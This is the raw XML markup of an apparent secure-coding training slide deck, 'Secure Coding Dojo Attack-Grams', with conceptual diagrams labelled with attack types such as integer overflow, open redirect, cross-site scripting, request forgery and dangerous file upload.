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1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4.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/_rels/slide16.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Override PartName="/ppt/slides/slide11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/media/image28.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image29.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image22.wmf" ContentType="image/x-wmf"/>
  <Override PartName="/ppt/media/image27.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image19.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image36.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image26.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image18.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3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20.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image21.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image8.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image13.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image30.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image10.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image9.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image37.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image38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4.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image31.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image23.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image15.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image32.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image24.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image16.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image33.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image25.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image17.png" ContentType="image/png"/>
  <Override PartName="/ppt/media/image3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0B9EBC2-DCC4-4E0D-ACCA-6E077F14F52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1E28C3-5CFB-44E5-801D-E8D8BB57DF5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FD3441-6DF0-4643-B97C-8406965D832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3BAC66B-A2A2-4512-82AD-2B54A447F41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AF6FFA-A2AB-4B54-8CB2-C0D9FF5B01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3BC5CE-1F60-4999-830B-17B93072374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B2E1F2-E8DE-4A73-BFC8-DDACB165B69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DC85D6-0B34-4BCD-B0E0-2F89A7D3079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CC545C-9116-4AD2-96C8-6A63E69A25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F1378E-1242-4327-B1F6-96E59D7D0F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C77652-BB1B-4481-976B-20D60CD34B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F63EE6-3107-49BB-9C03-368BA51D64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18B407-6FAA-4468-A41F-DF4C73C3892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9C671F-8273-471E-886F-3F548FB89A6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C11561-2612-4A74-8854-7AC496C367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7B7B13-13F9-45E2-9582-D74E40B58C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8042E0-DD9A-4B13-9867-7BCB0894150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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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2.wmf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4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image" Target="../media/image22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50600" y="678240"/>
            <a:ext cx="10514880" cy="214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666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&lt;Secure Coding Dojo/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="6600"/>
            </a:br>
            <a:r>
              <a:rPr b="1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Attack-Grams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itle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750600" y="3247200"/>
            <a:ext cx="11104560" cy="12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ffffff">
                    <a:alpha val="58000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A set of simple diagrams describing various attacks that leverage software flaws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253600" y="48420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Integer Overflow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661920" y="1646640"/>
            <a:ext cx="717840" cy="87228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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556080" y="2519280"/>
            <a:ext cx="806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Graphic 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914040" y="1606680"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843840" y="2530800"/>
            <a:ext cx="107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0" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="2851920"/>
            <a:ext cx="9360" cy="319284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191" name="Straight Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3908880" y="2854800"/>
            <a:ext cx="9360" cy="318996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192" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278360" y="3233880"/>
            <a:ext cx="2631240" cy="72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93" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316240" y="2904480"/>
            <a:ext cx="1395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4" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1270080" y="3248640"/>
            <a:ext cx="2648160" cy="85428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195" name="TextBox 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570400">
            <a:off x="1152720" y="3517560"/>
            <a:ext cx="193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6" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270800" y="4127040"/>
            <a:ext cx="2647440" cy="72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97" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316240" y="3800880"/>
            <a:ext cx="1395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8" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="4158000"/>
            <a:ext cx="2640240" cy="86904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199" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563200">
            <a:off x="1152360" y="4420440"/>
            <a:ext cx="193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Box 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2392200" y="2512440"/>
            <a:ext cx="372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1" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287000" y="5034960"/>
            <a:ext cx="2631240" cy="72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02" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316240" y="4698360"/>
            <a:ext cx="1395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3" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1269360" y="5080680"/>
            <a:ext cx="2640240" cy="768600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="70ad47"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="TextBox 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638200">
            <a:off x="1097640" y="5279760"/>
            <a:ext cx="206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Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4078440" y="3942720"/>
            <a:ext cx="3581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attempts = 32767 (MAX_SHORT)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Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4850640"/>
            <a:ext cx="4215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a94442"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>attempts = -32768 (&lt; MAX_ATTEMPTS)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Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4092120" y="3054240"/>
            <a:ext cx="205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attempts = 32766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Curved Connector 37"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="209" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="10800000">
            <a:off x="1245240" y="2267640"/>
            <a:ext cx="871200" cy="2904120"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30673"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="123825">
            <a:solidFill>
              <a:srgbClr val="767171">
                <a:alpha val="31000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp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51040" y="59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Download of Code Without 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Integrity Check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be 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1245600" y="1602720"/>
            <a:ext cx="869760" cy="132984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211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555720" y="1881360"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212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1840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298520" y="5654160"/>
            <a:ext cx="682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Box 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3344400" y="2754360"/>
            <a:ext cx="1133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Software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Graphic 17" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4411800" y="318888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7840" cy="925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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3359520" y="5325840"/>
            <a:ext cx="110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Malware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Box 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864720" y="2940120"/>
            <a:ext cx="2078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Box 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377680" y="3300480"/>
            <a:ext cx="9550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676520" y="568800"/>
            <a:ext cx="10514880" cy="54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Open Redirect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4230360" y="1460160"/>
            <a:ext cx="717840" cy="92556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507320" y="1431720"/>
            <a:ext cx="717840" cy="872280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915120" y="2275200"/>
            <a:ext cx="1950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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840120" y="2331000"/>
            <a:ext cx="1507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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230360" y="3651840"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="226" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1299960" y="3469680"/>
            <a:ext cx="1686960" cy="1498320"/>
            <a:chOff x="1299960" y="3469680"/>
            <a:chExt cx="1686960" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="227" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1410480" y="346968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8" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1746000" y="365292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9" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1299960" y="4604040"/>
              <a:ext cx="1686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30" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4181400" y="4604040"/>
            <a:ext cx="1049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1" name="Curved Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="227" idx="0"/>
            <a:endCxn id="223" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1609920" y="3189600"/>
            <a:ext cx="556560" cy="3960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24983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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="232" name="Curved Connector 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="223" idx="2"/>
            <a:endCxn id="221" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="2564640" y="1248120"/>
            <a:ext cx="991080" cy="2340720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -17914"/>
              <a:gd name="adj2" fmla="val 49484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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="233" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="225" idx="1"/>
            <a:endCxn id="228" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="2697480" y="4127400"/>
            <a:ext cx="1532880" cy="1440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24994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34" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002040" y="4183560"/>
            <a:ext cx="1042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Phishing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E-mail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Graphic 27" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="3596040"/>
            <a:ext cx="531360" cy="5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Curved Connector 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2746800" y="3225600"/>
            <a:ext cx="1601640" cy="85248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237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228480" y="1512360"/>
            <a:ext cx="1604880" cy="1949760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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233000" y="523440"/>
            <a:ext cx="10514880" cy="54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Scripting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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="1228320"/>
            <a:ext cx="1950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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005800" y="4450680"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="241" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2199600" y="4268520"/>
            <a:ext cx="1686960" cy="1498680"/>
            <a:chOff x="2199600" y="4268520"/>
            <a:chExt cx="1686960" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="242" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2310120" y="426852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3" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2645640" y="445212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4" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2199600" y="5403240"/>
              <a:ext cx="1686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5" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956840" y="5403240"/>
            <a:ext cx="1049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6" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="240" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="4212000" y="3180960"/>
            <a:ext cx="1600200" cy="939960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33438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247" name="Graphic 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="50877" r="83807" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973320" y="2496960"/>
            <a:ext cx="568440" cy="708480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="248" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="242" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1591560" y="2487240"/>
            <a:ext cx="718920" cy="2257560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43787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249" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742400" y="3515040"/>
            <a:ext cx="104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Picture 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233000" y="1561320"/>
            <a:ext cx="717840" cy="925560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="TextBox 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1224000"/>
            <a:ext cx="1507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069280" y="1383120"/>
            <a:ext cx="1604880" cy="1949760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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176480" y="361440"/>
            <a:ext cx="10514880" cy="54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Request Forgery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Box 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921680" y="1038960"/>
            <a:ext cx="1950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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="4321440"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="256" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1040400" y="4139280"/>
            <a:ext cx="1686960" cy="1498680"/>
            <a:chOff x="1040400" y="4139280"/>
            <a:chExt cx="1686960" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="257" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1150920" y="413928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8" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1486440" y="432288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9" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1040400" y="5274000"/>
              <a:ext cx="1686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0" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="5233680"/>
            <a:ext cx="1049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1" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="255" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3143160" y="2602440"/>
            <a:ext cx="1963800" cy="1474920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31884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262" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-3" t="-155" r="83693" b="49656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814840" y="1993680"/>
            <a:ext cx="572400" cy="728640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="263" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="258" idx="3"/>
            <a:endCxn id="255" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2438280" y="4797360"/>
            <a:ext cx="1948320" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25023"/>
            </a:avLst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264" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149280" y="4430880"/>
            <a:ext cx="104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$$$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Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="69000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1383120"/>
            <a:ext cx="1604880" cy="1949760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1068120"/>
            <a:ext cx="195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www.bank.com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7" name="Curved Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="262" idx="1"/>
            <a:endCxn id="258" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="1962360" y="2358000"/>
            <a:ext cx="852840" cy="1965240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/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268" name="Curved Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="265" idx="1"/>
            <a:endCxn id="252" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3674160" y="2358000"/>
            <a:ext cx="1866600" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/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269" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823560" y="1959840"/>
            <a:ext cx="195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/transferMoney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be 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804400" y="1536120"/>
            <a:ext cx="1299600" cy="1923840"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst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50680" y="615240"/>
            <a:ext cx="10514880" cy="54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Upload of Dangerous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Box 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530440" y="1182240"/>
            <a:ext cx="195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www.file.server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Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094280" y="4316400"/>
            <a:ext cx="951840" cy="951840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
